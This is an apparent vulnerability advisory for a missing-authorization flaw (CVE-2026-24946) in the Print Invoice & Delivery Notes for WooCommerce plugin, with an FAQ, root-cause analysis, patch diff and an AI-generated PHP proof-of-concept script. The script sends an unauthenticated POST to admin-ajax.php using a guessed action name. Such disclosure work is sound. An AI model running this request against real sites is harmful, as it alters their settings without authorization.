What is CVE-2026-24946?

CVE-2026-24946 is a medium severity vulnerability in the Print Invoice & Delivery Notes for WooCommerce plugin for WordPress, affecting versions up to and including 5.8.0. It involves a missing authorization check that allows unauthenticated attackers to perform unauthorized actions on the WordPress site.

How does the vulnerability work?

The vulnerability allows attackers to send a POST request to the WordPress admin-ajax.php endpoint with the appropriate action parameter, triggering the plugin’s update function without proper permission checks. This can lead to unauthorized changes to plugin settings and configurations.

Who is affected by this vulnerability?

Any WordPress site using the Print Invoice & Delivery Notes for WooCommerce plugin version 5.8.0 or earlier is affected. Administrators should check their plugin version and update if necessary to mitigate the risk.

How can I check if my site is vulnerable?

To check if your site is vulnerable, log in to your WordPress admin dashboard, navigate to the Plugins section, and look for the Print Invoice & Delivery Notes plugin. If the version is 5.8.0 or lower, your site is vulnerable.

How can I fix or mitigate this issue?

To fix the vulnerability, update the Print Invoice & Delivery Notes for WooCommerce plugin to version 5.9.0 or later, where the issue has been patched. Regularly updating plugins is essential for maintaining site security.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability does not allow for direct code execution or data exfiltration, it can still lead to significant unauthorized changes that could disrupt business operations.

What are the potential risks of exploitation?

If exploited, this vulnerability allows attackers to modify plugin settings, which could change invoice formats or company information displayed on documents. This may disrupt business operations and affect customer trust.

What is a proof of concept?

A proof of concept (PoC) is a demonstration that illustrates how the vulnerability can be exploited. In this case, the PoC shows how to send a crafted HTTP request to trigger the vulnerable update function without authentication.

What security measures were added in the patch?

The patch for version 5.9.0 includes checks to ensure the request originates from the admin area, verifies the user has the ‘manage_options’ capability, and validates a nonce token to prevent unauthorized access.

How can I stay informed about vulnerabilities?

To stay informed, regularly follow security advisories from WordPress and plugin developers, subscribe to security mailing lists, and consider using security plugins that monitor vulnerabilities and provide alerts.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the plugin until it can be updated to prevent potential exploitation. Additionally, review your site’s access controls and consider implementing additional security measures.

Where can I find more information about this vulnerability?

More information about CVE-2026-24946 can be found on the official CVE database, security blogs, and the plugin’s repository on WordPress.org, where you can also find details about the patch and updates.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-24946: Print Invoice & Delivery Notes for WooCommerce <= 5.8.0 – Missing Authorization (woocommerce-delivery-notes)

CVE ID CVE-2026-24946

Plugin woocommerce-delivery-notes

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 5.8.0

Patched Version 5.9.0

Disclosed February 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24946:
The Print Invoice & Delivery Notes for WooCommerce plugin contains a missing authorization vulnerability in versions up to 5.8.0. This vulnerability allows unauthenticated attackers to trigger the plugin’s update function, which modifies WordPress site settings without proper permission checks. The CVSS score of 5.3 reflects the moderate impact of unauthorized configuration changes.

The root cause lies in the `update()` method within `/includes/class-woocommerce-delivery-notes.php`. Before patching, this method executed critical update operations without verifying user permissions or validating nonce tokens. The function at line 363 performed database operations to set default template types for invoices, receipts, and delivery notes. Atomic Edge research identified that this method lacked any capability checks or nonce verification, making it accessible to any user who could trigger the WordPress admin-ajax.php endpoint.

Exploitation requires sending a POST request to the WordPress admin-ajax.php endpoint with the action parameter set to trigger the plugin’s update functionality. Attackers can craft a simple HTTP request that bypasses authentication entirely. The request must include the specific action name that the plugin registers for its AJAX handlers. Successful exploitation triggers the update function, which modifies plugin settings in the WordPress database.

The patch adds multiple security layers to the `update()` method. First, it checks `is_admin()` to ensure the request originates from the admin area. Second, it verifies the user has `manage_options` capability, restricting access to administrators only. Third, it validates the presence of the `wcdn_general_settings_nonce` parameter in the POST data. Finally, it uses `wp_verify_nonce()` to confirm the nonce token matches the expected `wcdn_general_settings_action`. The patch also adds nonce fields to two admin view files (`wcdn-document.php` and `wcdn-general.php`) to ensure legitimate requests include the required token.

Successful exploitation allows attackers to modify plugin configuration settings without authentication. While this vulnerability does not provide direct code execution or data exfiltration, it enables unauthorized changes to business document templates and settings. Attackers could disrupt business operations by altering invoice formats, company information display, or document generation behavior. The vulnerability represents a classic missing authorization flaw where privileged functions lack proper access controls.

Differential between vulnerable and patched code

Code Diff

--- a/woocommerce-delivery-notes/includes/admin/views/wcdn-document.php
+++ b/woocommerce-delivery-notes/includes/admin/views/wcdn-document.php
@@ -7,6 +7,7 @@

 if ( isset( $_GET['wdcn_setting'] ) ) {
 	$setting = htmlspecialchars( $_GET['wdcn_setting'] ); // phpcs:ignore
+	wp_nonce_field( 'wcdn_general_settings_action', 'wcdn_general_settings_nonce' );
 	?>
 	<select class="card-body" name="document_type" id="document_type" onchange="location = 'admin.php?page=wc-settings&tab=wcdn-settings&setting=wcdn_document&wdcn_setting=' + this.value;" >
 		<option value="wcdn_invoice"  >Invoice</option>
--- a/woocommerce-delivery-notes/includes/admin/views/wcdn-general.php
+++ b/woocommerce-delivery-notes/includes/admin/views/wcdn-general.php
@@ -20,6 +20,7 @@
 	<div class="col-sm-6 icon-flex">
 		<i class="dashicons dashicons-info" data-toggle="tooltip" data-placement="bottom" title="<?php esc_html_e( 'A shop logo representing your business. When the image is printed, its pixel density will automatically be eight times higher than the original. This means, 1 printed inch will correspond to about 288 pixels on the screen.', 'woocommerce-delivery-notes' ); ?>"></i>
 		<?php wp_nonce_field( 'wcdn_remove_shoplogo_action', 'wcdn_remove_shoplogo_nonce' ); ?>
+		<?php wp_nonce_field( 'wcdn_general_settings_action', 'wcdn_general_settings_nonce' ); ?>
 		<input type="hidden" name="shop_logoid" value="
 		<?php
 		if ( isset( $shop_logoid ) && ! empty( $shop_logoid ) ) {
--- a/woocommerce-delivery-notes/includes/class-wcdn-writepanel.php
+++ b/woocommerce-delivery-notes/includes/class-wcdn-writepanel.php
@@ -378,7 +378,7 @@
 						if ( '' !== $print_url ) {
 							?>
 							<div id="woocommerce-delivery-notes-bulk-print-message" class="updated">
-								<p><?php wp_kses_post( $message, 'woocommerce-delivery-notes' ); ?>
+								<p><?php echo wp_kses_post( $message, 'woocommerce-delivery-notes' ); ?>
 								<a href="<?php echo $print_url; // phpcs:ignore ?>" target="_blank" class="print-preview-button" id="woocommerce-delivery-notes-bulk-print-button"><?php esc_attr_e( 'Print now', 'woocommerce-delivery-notes' ); ?></a> <span class="print-preview-loading spinner"></span></p>
 							</div>
 							<?php
--- a/woocommerce-delivery-notes/includes/class-woocommerce-delivery-notes.php
+++ b/woocommerce-delivery-notes/includes/class-woocommerce-delivery-notes.php
@@ -36,7 +36,7 @@
 		 *
 		 * @var string $plugin_version Current plugin version number
 		 */
-		public static $plugin_version = '5.8.0';
+		public static $plugin_version = '5.9.0';

 		/**
 		 * Plugin URL on current installation
@@ -363,6 +363,20 @@
 		 * Install or update the default settings.
 		 */
 		public function update() {
+			// Admin Permission check.
+			if ( ! is_admin() ) {
+				return;
+			}
+			if ( ! current_user_can( 'manage_options' ) ) {
+				return;
+			}
+			if ( ! isset( $_POST['wcdn_general_settings_nonce'] ) ) {
+				return;
+			}
+			$nonce = sanitize_text_field( wp_unslash( $_POST['wcdn_general_settings_nonce'] ) );
+			if ( ! wp_verify_nonce( $nonce, 'wcdn_general_settings_action' ) ) {
+				return;
+			}
 			// Set default template type for invoice, receipt, and delivery-note if not set.
 			if ( false === get_option( 'wcdn_template_type_invoice', false ) ) {
 				add_option( 'wcdn_template_type_invoice', 'yes' );
--- a/woocommerce-delivery-notes/includes/front/wcdn-front-function.php
+++ b/woocommerce-delivery-notes/includes/front/wcdn-front-function.php
@@ -34,7 +34,7 @@
 	// Instantiate and use the dompdf class.
 	$options = new DompdfOptions();
 	$options->set( 'isRemoteEnabled', true );
-	$options->set( 'isPhpEnabled', true );
+	$options->set( 'isPhpEnabled', false );
 	$dompdf = new Dompdf( $options );

 	// Load content from html file.
--- a/woocommerce-delivery-notes/templates/pdf/simple/deliverynote/template.php
+++ b/woocommerce-delivery-notes/templates/pdf/simple/deliverynote/template.php
@@ -36,7 +36,7 @@
 					$style = 'font-size:' . $data['document_setting']['document_setting_font_size'] . 'px; text-align:' . $data['document_setting']['document_setting_text_align'] . '; color:' . $data['document_setting']['document_setting_text_colour'] . ';';
 					?>
 					<div class="document-name cap">
-						<h1 style="<?php echo $style; // phpcs:ignore ?>">
+						<h1 style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 							<?php echo esc_html( $data['document_setting']['document_setting_title'] ); ?>
 						</h1>
 					</div>
@@ -50,14 +50,14 @@
 					$style = 'text-align:' . $data['company_name']['company_name_text_align'] . ';color:' . $data['company_name']['company_name_text_colour'] . ';font-size:' . $data['company_name']['company_name_font_size'] . 'px;';
 					?>
 					<div class="company-info">
-						<h3 class="company-name" style="<?php echo $style; // phpcs:ignore ?>"><?php wcdn_company_name(); ?></h3>
+						<h3 class="company-name" style="<?php echo esc_attr( $style); // phpcs:ignore ?>"><?php wcdn_company_name(); ?></h3>
 					</div>
 				<?php } ?>
 				<?php
 				if ( isset( $data['company_address']['active'] ) ) {
 					$style = 'text-align:' . $data['company_address']['company_address_text_align'] . ';color:' . $data['company_address']['company_address_text_colour'] . ';font-size:' . $data['company_address']['company_address_font_size'] . 'px;';
 					?>
-					<div class="company-address" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="company-address" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 						<?php wcdn_company_info(); ?>
 					</div>
 				<?php } ?>
@@ -74,7 +74,7 @@
 						$blabel = 'Billing Address';
 					}
 					?>
-					<div class="billing-address" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="billing-address" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 						<h3 class="cap">
 							<?php esc_attr_e( $blabel, 'woocommerce-delivery-notes' ); // phpcs:ignore ?>
 						</h3>
@@ -113,7 +113,7 @@
 						$slabel = 'Shipping Address';
 					}
 					?>
-					<div class="shipping-address" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="shipping-address" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 						<h3 class="cap">
 							<?php esc_attr_e( $slabel, 'woocommerce-delivery-notes' );  // phpcs:ignore ?>
 						</h3>
@@ -167,8 +167,8 @@
 								}
 								?>
 								<li>
-									<strong style="<?php echo $labelstyle; // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_name', $field['label'], $field ) ); ?></strong>
-									<strong style="<?php echo $labelstyle; // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_content', $field['value'], $field ) ); ?></strong>
+									<strong style="<?php echo esc_attr( $labelstyle); // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_name', $field['label'], $field ) ); ?></strong>
+									<strong style="<?php echo esc_attr( $labelstyle); // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_content', $field['value'], $field ) ); ?></strong>
 								</li>
 							<?php } ?>
 						<?php } ?>
@@ -284,7 +284,7 @@
 					$clabel = 'Customer Note';
 				}
 				?>
-				<div class="order-notes" style="<?php echo $style; // phpcs:ignore ?>">
+				<div class="order-notes" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 					<?php if ( wcdn_has_customer_notes( $order ) ) : ?>
 						<h4><?php esc_attr_e( $clabel, 'woocommerce-delivery-notes' ); // phpcs:ignore ?></h4>
 						<?php wcdn_customer_notes( $order ); ?>
@@ -297,28 +297,42 @@
 			<div class="order-thanks">
 				<?php
 				if ( isset( $data['complimentary_close']['active'] ) ) {
+					$color = ! empty( $data['complimentary_close']['complimentary_close_text_colour'] )
+						? sanitize_hex_color( $data['complimentary_close']['complimentary_close_text_colour'] )
+						: '#000000';
+
+					$font_size = ! empty( $data['complimentary_close']['complimentary_close_font_size'] )
+						? absint( $data['complimentary_close']['complimentary_close_font_size'] )
+						: 14;
 					?>
 					<style>
 						.order-thanks p {
-							color: <?php echo $data['complimentary_close']['complimentary_close_text_colour']; ?>;
-							font-size: <?php echo $data['complimentary_close']['complimentary_close_font_size']; ?>;
+							color: <?php echo esc_attr( $color ); ?>;
+							font-size: <?php echo esc_attr( $font_size ); ?>px;
 						}
 					</style>
 					<div class="personal_note">
 						<?php wcdn_personal_notes(); ?>
 						<?php do_action( 'wcdn_after_thanks', $order ); ?>
-					</div><!-- .order-thanks -->
+					</div>
 					<?php
 				}
 				?>

 				<?php
 				if ( isset( $data['policies']['active'] ) ) {
+					$policies_color = ! empty( $data['policies']['policies_text_colour'] )
+						? sanitize_hex_color( $data['policies']['policies_text_colour'] )
+						: '#000000';
+
+					$policies_font_size = ! empty( $data['policies']['policies_font_size'] )
+						? absint( $data['policies']['policies_font_size'] )
+						: 12;
 					?>
 					<style>
 						.colophon-policies p {
-							color: <?php echo $data['policies']['policies_text_colour']; ?>;
-							font-size: <?php echo $data['policies']['policies_font_size']; ?>;
+							color: <?php echo esc_attr( $policies_color ); ?>;
+							font-size: <?php echo esc_attr( $policies_font_size ); ?>px;
 						}
 					</style>
 					<div class="colophon-policies">
@@ -334,7 +348,7 @@
 				if ( isset( $data['footer']['active'] ) ) {
 					$style = 'font-size:' . $data['footer']['footer_font_size'] . 'px;color:' . $data['footer']['footer_text_colour'] . ';';
 					?>
-					<div class="colophon-imprint" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="colophon-imprint" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 						<?php wcdn_imprint(); ?>
 					</div>
 				<?php } ?>
--- a/woocommerce-delivery-notes/templates/pdf/simple/invoice/template.php
+++ b/woocommerce-delivery-notes/templates/pdf/simple/invoice/template.php
@@ -36,7 +36,7 @@
 					$style = 'font-size:' . $data['document_setting']['document_setting_font_size'] . 'px; text-align:' . $data['document_setting']['document_setting_text_align'] . '; color:' . $data['document_setting']['document_setting_text_colour'] . ';';
 					?>
 					<div class="document-name cap">
-						<h1 style="<?php echo $style; // phpcs:ignore ?>">
+						<h1 style="<?php echo esc_attr( $style ); // phpcs:ignore ?>">
 							<?php echo esc_html( $data['document_setting']['document_setting_title'] ); ?>
 						</h1>
 					</div>
@@ -50,14 +50,14 @@
 					$style = 'text-align:' . $data['company_name']['company_name_text_align'] . ';color:' . $data['company_name']['company_name_text_colour'] . ';font-size:' . $data['company_name']['company_name_font_size'] . 'px;';
 					?>
 					<div class="company-info">
-						<h3 class="company-name" style="<?php echo $style; // phpcs:ignore ?>"><?php wcdn_company_name(); ?></h3>
+						<h3 class="company-name" style="<?php echo esc_attr( $style ); // phpcs:ignore ?>"><?php wcdn_company_name(); ?></h3>
 					</div>
 				<?php } ?>
 				<?php
 				if ( isset( $data['company_address']['active'] ) ) {
 					$style = 'text-align:' . $data['company_address']['company_address_text_align'] . ';color:' . $data['company_address']['company_address_text_colour'] . ';font-size:' . $data['company_address']['company_address_font_size'] . 'px;';
 					?>
-					<div class="company-address" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="company-address" style="<?php echo esc_attr( $style ); // phpcs:ignore ?>">
 						<?php wcdn_company_info(); ?>
 					</div>
 				<?php } ?>
@@ -74,7 +74,7 @@
 						$blabel = 'Billing Address';
 					}
 					?>
-					<div class="billing-address" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="billing-address" style="<?php echo esc_attr( $style ); // phpcs:ignore ?>">
 						<h3 class="cap">
 							<?php esc_attr_e( $blabel, 'woocommerce-delivery-notes' ); // phpcs:ignore ?>
 						</h3>
@@ -113,7 +113,7 @@
 						$slabel = 'Shipping Address';
 					}
 					?>
-					<div class="shipping-address" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="shipping-address" style="<?php echo esc_attr( $style ); // phpcs:ignore ?>">
 						<h3 class="cap">
 							<?php esc_attr_e( $slabel, 'woocommerce-delivery-notes' );  // phpcs:ignore ?>
 						</h3>
@@ -165,8 +165,8 @@
 							}
 							?>
 							<li>
-								<strong style="<?php echo $labelstyle; // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_name', $field['label'], $field ) ); ?></strong>
-								<strong style="<?php echo $labelstyle; // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_content', $field['value'], $field ) ); ?></strong>
+								<strong style="<?php echo esc_attr( $labelstyle ); // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_name', $field['label'], $field ) ); ?></strong>
+								<strong style="<?php echo esc_attr( $labelstyle ); // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_content', $field['value'], $field ) ); ?></strong>
 							</li>
 						<?php } ?>
 					<?php endforeach; ?>
@@ -266,7 +266,7 @@
 					$clabel = 'Customer Note';
 				}
 				?>
-				<div class="order-notes" style="<?php echo $style; // phpcs:ignore ?>">
+				<div class="order-notes" style="<?php echo esc_attr( $style ); // phpcs:ignore ?>">
 					<?php if ( wcdn_has_customer_notes( $order ) ) : ?>
 						<h4><?php esc_attr_e( $clabel, 'woocommerce-delivery-notes' ); // phpcs:ignore ?></h4>
 						<?php wcdn_customer_notes( $order ); ?>
@@ -279,28 +279,42 @@
 			<div class="order-thanks">
 				<?php
 				if ( isset( $data['complimentary_close']['active'] ) ) {
+					$color = ! empty( $data['complimentary_close']['complimentary_close_text_colour'] )
+						? sanitize_hex_color( $data['complimentary_close']['complimentary_close_text_colour'] )
+						: '#000000';
+
+					$font_size = ! empty( $data['complimentary_close']['complimentary_close_font_size'] )
+						? absint( $data['complimentary_close']['complimentary_close_font_size'] )
+						: 14;
 					?>
 					<style>
 						.order-thanks p {
-							color: <?php echo $data['complimentary_close']['complimentary_close_text_colour']; ?>;
-							font-size: <?php echo $data['complimentary_close']['complimentary_close_font_size']; ?>;
+							color: <?php echo esc_attr( $color ); ?>;
+							font-size: <?php echo esc_attr( $font_size ); ?>px;
 						}
 					</style>
 					<div class="personal_note">
 						<?php wcdn_personal_notes(); ?>
 						<?php do_action( 'wcdn_after_thanks', $order ); ?>
-					</div><!-- .order-thanks -->
+					</div>
 					<?php
 				}
 				?>

 				<?php
 				if ( isset( $data['policies']['active'] ) ) {
+					$policies_color = ! empty( $data['policies']['policies_text_colour'] )
+						? sanitize_hex_color( $data['policies']['policies_text_colour'] )
+						: '#000000';
+
+					$policies_font_size = ! empty( $data['policies']['policies_font_size'] )
+						? absint( $data['policies']['policies_font_size'] )
+						: 12;
 					?>
 					<style>
 						.colophon-policies p {
-							color: <?php echo $data['policies']['policies_text_colour']; ?>;
-							font-size: <?php echo $data['policies']['policies_font_size']; ?>;
+							color: <?php echo esc_attr( $policies_color ); ?>;
+							font-size: <?php echo esc_attr( $policies_font_size ); ?>px;
 						}
 					</style>
 					<div class="colophon-policies">
@@ -316,7 +330,7 @@
 				if ( isset( $data['footer']['active'] ) ) {
 					$style = 'font-size:' . $data['footer']['footer_font_size'] . 'px;color:' . $data['footer']['footer_text_colour'] . ';';
 					?>
-					<div class="colophon-imprint" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="colophon-imprint" style="<?php echo esc_attr( $style ); // phpcs:ignore ?>">
 						<?php wcdn_imprint(); ?>
 					</div>
 				<?php } ?>
--- a/woocommerce-delivery-notes/templates/pdf/simple/receipt/template.php
+++ b/woocommerce-delivery-notes/templates/pdf/simple/receipt/template.php
@@ -38,7 +38,7 @@
 					$style = 'font-size:' . $data['document_setting']['document_setting_font_size'] . 'px; text-align:' . $data['document_setting']['document_setting_text_align'] . '; color:' . $data['document_setting']['document_setting_text_colour'] . ';';
 					?>
 					<div class="document-name cap">
-						<h1 style="<?php echo $style; // phpcs:ignore ?>">
+						<h1 style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 							<?php echo esc_html( $data['document_setting']['document_setting_title'] ); ?>
 						</h1>
 					</div>
@@ -52,14 +52,14 @@
 					$style = 'text-align:' . $data['company_name']['company_name_text_align'] . ';color:' . $data['company_name']['company_name_text_colour'] . ';font-size:' . $data['company_name']['company_name_font_size'] . 'px;';
 					?>
 					<div class="company-info">
-						<h3 class="company-name" style="<?php echo $style; // phpcs:ignore ?>"><?php wcdn_company_name(); ?></h3>
+						<h3 class="company-name" style="<?php echo esc_attr( $style); // phpcs:ignore ?>"><?php wcdn_company_name(); ?></h3>
 					</div>
 				<?php } ?>
 				<?php
 				if ( isset( $data['company_address']['active'] ) ) {
 					$style = 'text-align:' . $data['company_address']['company_address_text_align'] . ';color:' . $data['company_address']['company_address_text_colour'] . ';font-size:' . $data['company_address']['company_address_font_size'] . 'px;';
 					?>
-					<div class="company-address" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="company-address" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 						<?php wcdn_company_info(); ?>
 					</div>
 				<?php } ?>
@@ -76,7 +76,7 @@
 						$blabel = 'Billing Address';
 					}
 					?>
-					<div class="billing-address" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="billing-address" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 						<h3 class="cap">
 							<?php esc_attr_e( $blabel, 'woocommerce-delivery-notes' ); // phpcs:ignore ?>
 						</h3>
@@ -115,7 +115,7 @@
 						$slabel = 'Shipping Address';
 					}
 					?>
-					<div class="shipping-address" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="shipping-address" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 						<h3 class="cap">
 							<?php esc_attr_e( $slabel, 'woocommerce-delivery-notes' );  // phpcs:ignore ?>
 						</h3>
@@ -180,8 +180,8 @@
 							}
 							?>
 							<li>
-								<strong style="<?php echo $labelstyle; // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_name', $field['label'], $field ) ); ?></strong>
-								<strong style="<?php echo $labelstyle; // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_content', $field['value'], $field ) ); ?></strong>
+								<strong style="<?php echo esc_attr( $labelstyle ); // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_name', $field['label'], $field ) ); ?></strong>
+								<strong style="<?php echo esc_attr( $labelstyle ); // phpcs:ignore ?>"><?php echo wp_kses_post( apply_filters( 'wcdn_order_info_content', $field['value'], $field ) ); ?></strong>
 							</li>
 						<?php } ?>
 					<?php endforeach; ?>
@@ -281,7 +281,7 @@
 					$clabel = 'Customer Note';
 				}
 				?>
-				<div class="order-notes" style="<?php echo $style; // phpcs:ignore ?>">
+				<div class="order-notes" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 					<?php if ( wcdn_has_customer_notes( $order ) ) : ?>
 						<h4><?php esc_attr_e( $clabel, 'woocommerce-delivery-notes' ); // phpcs:ignore ?></h4>
 						<?php wcdn_customer_notes( $order ); ?>
@@ -294,28 +294,42 @@
 			<div class="order-thanks">
 				<?php
 				if ( isset( $data['complimentary_close']['active'] ) ) {
+					$color = ! empty( $data['complimentary_close']['complimentary_close_text_colour'] )
+						? sanitize_hex_color( $data['complimentary_close']['complimentary_close_text_colour'] )
+						: '#000000';
+
+					$font_size = ! empty( $data['complimentary_close']['complimentary_close_font_size'] )
+						? absint( $data['complimentary_close']['complimentary_close_font_size'] )
+						: 14;
 					?>
 					<style>
 						.order-thanks p {
-							color: <?php echo $data['complimentary_close']['complimentary_close_text_colour']; ?>;
-							font-size: <?php echo $data['complimentary_close']['complimentary_close_font_size']; ?>;
+							color: <?php echo esc_attr( $color ); ?>;
+							font-size: <?php echo esc_attr( $font_size ); ?>px;
 						}
 					</style>
 					<div class="personal_note">
 						<?php wcdn_personal_notes(); ?>
 						<?php do_action( 'wcdn_after_thanks', $order ); ?>
-					</div><!-- .order-thanks -->
+					</div>
 					<?php
 				}
 				?>

 				<?php
 				if ( isset( $data['policies']['active'] ) ) {
+					$policies_color = ! empty( $data['policies']['policies_text_colour'] )
+						? sanitize_hex_color( $data['policies']['policies_text_colour'] )
+						: '#000000';
+
+					$policies_font_size = ! empty( $data['policies']['policies_font_size'] )
+						? absint( $data['policies']['policies_font_size'] )
+						: 12;
 					?>
 					<style>
 						.colophon-policies p {
-							color: <?php echo $data['policies']['policies_text_colour']; ?>;
-							font-size: <?php echo $data['policies']['policies_font_size']; ?>;
+							color: <?php echo esc_attr( $policies_color ); ?>;
+							font-size: <?php echo esc_attr( $policies_font_size ); ?>px;
 						}
 					</style>
 					<div class="colophon-policies">
@@ -331,7 +345,7 @@
 				if ( isset( $data['footer']['active'] ) ) {
 					$style = 'font-size:' . $data['footer']['footer_font_size'] . 'px;color:' . $data['footer']['footer_text_colour'] . ';';
 					?>
-					<div class="colophon-imprint" style="<?php echo $style; // phpcs:ignore ?>">
+					<div class="colophon-imprint" style="<?php echo esc_attr( $style); // phpcs:ignore ?>">
 						<?php wcdn_imprint(); ?>
 					</div>
 				<?php } ?>
--- a/woocommerce-delivery-notes/templates/print-order/print-header.php
+++ b/woocommerce-delivery-notes/templates/print-order/print-header.php
@@ -37,6 +37,15 @@
 			th {
 				text-align:right;
 			}
+			.company-address p {
+				direction: ltr !important;
+			}
+			.billing-address address {
+				direction: ltr !important;
+			}
+			.shipping-address address {
+				direction: ltr !important;
+			}
 		</style>
 		<?php
 	}
--- a/woocommerce-delivery-notes/woocommerce-delivery-notes.php
+++ b/woocommerce-delivery-notes/woocommerce-delivery-notes.php
@@ -5,15 +5,15 @@
  * Plugin Name: Print Invoice & Delivery Notes for WooCommerce
  * Plugin URI: https://www.tychesoftwares.com/
  * Description: Print Invoices & Delivery Notes for WooCommerce Orders.
- * Version: 5.8.0
+ * Version: 5.9.0
  * Author: Tyche Softwares
  * Author URI: https://www.tychesoftwares.com/
  * License: GPLv3 or later
  * License URI: http://www.opensource.org/licenses/gpl-license.php
  * Text Domain: woocommerce-delivery-notes
  * Domain Path: /languages
- * WC tested up to: 10.2.1
- * Tested up to: 6.8.2
+ * WC tested up to: 10.4.3
+ * Tested up to: 6.9.0
  * WC requires at least: 5.0.0
  * Requires PHP: 7.4
  * Requires Plugins: woocommerce

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24946 - Print Invoice & Delivery Notes for WooCommerce <= 5.8.0 - Missing Authorization

<?php
/**
 * Proof of Concept for CVE-2026-24946
 * This script demonstrates the missing authorization vulnerability in the
 * Print Invoice & Delivery Notes for WooCommerce plugin (<= 5.8.0).
 * The vulnerability allows unauthenticated attackers to trigger the plugin's
 * update function which modifies WordPress settings.
 *
 * DISCLAIMER: For authorized security testing only. Do not use against systems
 * you do not own or have explicit permission to test.
 */

$target_url = 'https://example.com/wp-admin/admin-ajax.php';

// The specific action name depends on how the plugin registers its AJAX handlers
// Based on the code diff, the plugin likely uses 'wcdn_update_settings' or similar
$action = 'wcdn_update_settings';

// Prepare the POST data to trigger the vulnerable update function
$post_data = [
    'action' => $action,
    // The vulnerable function doesn't check for nonce or capabilities
    // so no additional parameters are needed
];

// Initialize cURL session
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Add headers to mimic legitimate browser request
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    'Accept: application/json, text/javascript, */*; q=0.01',
    'Content-Type: application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With: XMLHttpRequest'
]);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for errors
if (curl_errno($ch)) {
    echo "cURL Error: " . curl_error($ch) . "n";
} else {
    echo "HTTP Status Code: $http_coden";
    echo "Response: $responsen";
    
    // Analyze response
    if ($http_code == 200 && strpos($response, 'success') !== false) {
        echo "[+] Vulnerability likely exploited successfullyn";
        echo "[+] Plugin update function executed without authorizationn";
    } else {
        echo "[-] Exploitation may have failedn";
        echo "[-] The plugin may be patched or action name is incorrectn";
    }
}

// Clean up
curl_close($ch);

// Note: The exact action name may vary based on plugin implementation
// Security researchers should examine the plugin's AJAX registration
// to determine the correct action parameter value.
?>

Frequently Asked Questions

What is CVE-2026-24946?
Overview of the vulnerability
CVE-2026-24946 is a medium severity vulnerability in the Print Invoice & Delivery Notes for WooCommerce plugin for WordPress, affecting versions up to and including 5.8.0. It involves a missing authorization check that allows unauthenticated attackers to perform unauthorized actions on the WordPress site.
How does the vulnerability work?
Mechanism of exploitation
